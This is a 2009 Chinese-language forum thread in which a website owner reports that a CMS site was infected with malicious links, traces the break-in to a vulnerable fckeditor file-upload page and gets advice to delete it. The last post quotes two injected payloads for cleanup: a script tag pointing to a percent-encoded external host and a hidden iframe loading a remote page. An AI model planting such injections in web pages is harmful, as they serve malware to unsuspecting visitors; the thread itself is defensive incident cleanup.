jiajufan - 2009/10/5 13:12:00
用PA建的一个站,今天突然后台无法登录,提示版权错误,我没有修改过版权,查找论坛相关方法也无法解决,
就准备重新安装,备份的时候发现大量文件中含有:http://www. 1758game .com ,应该是被挂马了!
发布一下,希望官方重视!
鄙视挂马的垃圾!
jiajufan - 2009/10/5 13:32:00
www. 416886. cn/cps 还有这个,很多文件里含有这个:+
lzy5188 - 2009/10/5 21:01:00
jiajufan - 2009/10/6 0:19:00
今天想升级到最新版本防止被挂马,我用的是老版本:V2.1 20090410,结果没成功,出现各种各样的错误,只好恢复回老版本。
寻找不被挂马的解决方法,高人指点!
xiyou - 2009/10/6 9:10:00
jiajufan - 2009/10/8 15:55:00
经测试,fckeditor编辑器自带的/master/fckeditor/editor/filemanager/browser/default/browser.html这个文件存在安全漏洞,非法用户可通过此文件上传程序破坏网站文件。
解决方法1:删除此文件 (推荐此方法,简单无需烦琐升级操作)
解决方法2:升级到最新版本
请问老大,如果我删除了那个文件,对网站有影响吗?谢谢批点!:(
xiyou - 2009/10/8 16:05:00
无影响
8834155 - 2009/10/9 13:14:00
楼主啊,我的问题和你的一样。你是怎么解决后台登陆版权验证错误的问题啊?
jiajufan - 2009/10/9 14:53:00
回楼上兄弟,我就是找到所有被挂马的页面,把他们给加入的那些代码都删除,后台就可以登录了!
jiajufan - 2009/10/9 15:23:00
<script src=http://%6B%75%6D%6F%67%72%6F%75%70%2E%63%6E></script>
这段也要全站查一下,也是木马!
还有这个:<DIV style="DISPLAY: none"><IFRAME src="http://520l.9966.org/dszq/2.htm"></IFRAME></DIV>